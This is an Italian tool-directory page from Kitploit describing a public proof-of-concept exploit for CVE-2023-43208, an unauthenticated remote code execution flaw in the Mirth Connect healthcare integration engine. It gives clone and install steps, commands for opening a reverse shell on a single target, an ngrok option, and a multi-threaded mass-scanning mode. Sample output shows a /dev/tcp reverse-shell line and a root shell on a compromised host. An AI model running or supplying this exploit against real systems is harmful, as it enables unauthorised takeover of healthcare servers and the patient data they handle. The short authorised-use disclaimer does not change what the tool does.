Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-43208 — Un exploit PoC per CVE-2023-43208 - Mirth Connect Remote Code Execution (RCE) | Kitploit
Strumenti/GitHubGitHub/4nuxd/cve-2023-43208
Scanner di VulnerabilitàGenerazione di PayloadExploitSfruttamento di Applicazioni WebPenetration TestingStrumento di Accesso Remoto
GitHub4nuxd/cve-2023-43208

CVE-2023-43208

Un exploit PoC per CVE-2023-43208 - Mirth Connect Remote Code Execution (RCE)

Vedi Repository
15 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-43208 — Esecuzione Remota di Codice in Mirth Connect

Python CVE Platform

Exploit Proof-of-Concept per CVE-2023-43208, una vulnerabilità di Esecuzione Remota di Codice non autenticata in Mirth Connect versioni precedenti alla 4.4.1.


Descrizione

Mirth Connect è un motore di integrazione sanitaria open-source ampiamente distribuito. Questa vulnerabilità sfrutta un difetto di deserializzazione Java tramite l'endpoint /api/users utilizzando un payload XML modificato che incatena gadget Apache Commons Collections per ottenere RCE non autenticata.

La versione migliorata sostituisce il listener pwncat originale con una shell PTY interattiva completamente priva di dipendenze, utilizzando solo librerie standard di Python (socket, select, tty, termios). La shell viene automaticamente aggiornata a una PTY completa alla connessione.


Versioni Affette

SoftwareVersioni VulnerabiliVersione Corretta
Mirth Connect< 4.4.14.4.1+

Caratteristiche

  • Rilevamento automatico dell'istanza Mirth Connect
  • Fingerprinting della versione e verifica della vulnerabilità
  • RCE non autenticata tramite payload di deserializzazione XML
  • Aggiornamento automatico della shell a PTY (fallback python3/python/script)
  • Corretta propagazione delle dimensioni del terminale (stty rows/cols)
  • Scanner bulk con supporto multi-threading
  • Salvataggio dei target vulnerabili su file
  • Nessuna dipendenza da pwncat — solo libreria standard per il listener

Installazione

root@kitploit:~
git clone https://github.com/yourrepo/CVE-2023-43208
cd CVE-2023-43208
pip install -r requirements.txt

Requisiti

root@kitploit:~
requests
packaging
rich
alive-progress

Utilizzo

Singolo Target — Ottieni una Shell

root@kitploit:~
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <PORT>

Singolo Target — Con ngrok / Porta di Binding

root@kitploit:~
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <NGROK_PORT> -bp <LOCAL_PORT>

Scansione di Massa da File

root@kitploit:~
python3 CVE-2023-43208.py -f targets.txt -t 50 -o vulnerable.txt

Argomenti


Esempio di Output

root@kitploit:~
[*] Setting up listener on 10.10.15.202:4444 and launching exploit...
[*] Waiting for incoming connection on port 4444...
[*] Looking for Mirth Connect instance...
[+] Found Mirth Connect instance
[+] Vulnerable Mirth Connect version 4.4.0 instance found at https://10.129.5.3
[!] sh -c $@|sh . echo bash -c '0<&53-;exec 53<>/dev/tcp/...'
[*] Launching exploit against https://10.129.5.3...
[+] Received connection from 10.129.5.3:59640
[+] Shell opened! Upgrading to PTY...

root@mirth:/# 

Dichiarazione di non responsabilità

Questo strumento è destinato esclusivamente a test di penetrazione autorizzati e scopi educativi.
L'uso non autorizzato contro sistemi di cui non si possiede la proprietà o per i quali non si è ottenuto esplicito permesso è illegale.
Gli autori non sono responsabili per qualsiasi uso improprio o danno causato da questo strumento.


Crediti

  • Codificato da: K3ysTr0K3R e Chocapikk
  • Migliorato da: 4nuxd
Scarica lo strumento
FlagDescrizione
-u, --urlURL del target
-lh, --lhostIl tuo IP di ascolto
-lp, --lportLa tua porta in ascolto
-bp, --bindportOverride della porta di binding (utile con ngrok)
-f, --fileFile contenente l'elenco degli URL target
-o, --outputSalva i target vulnerabili su file
-t, --threadsNumero di thread per la scansione (default: 50)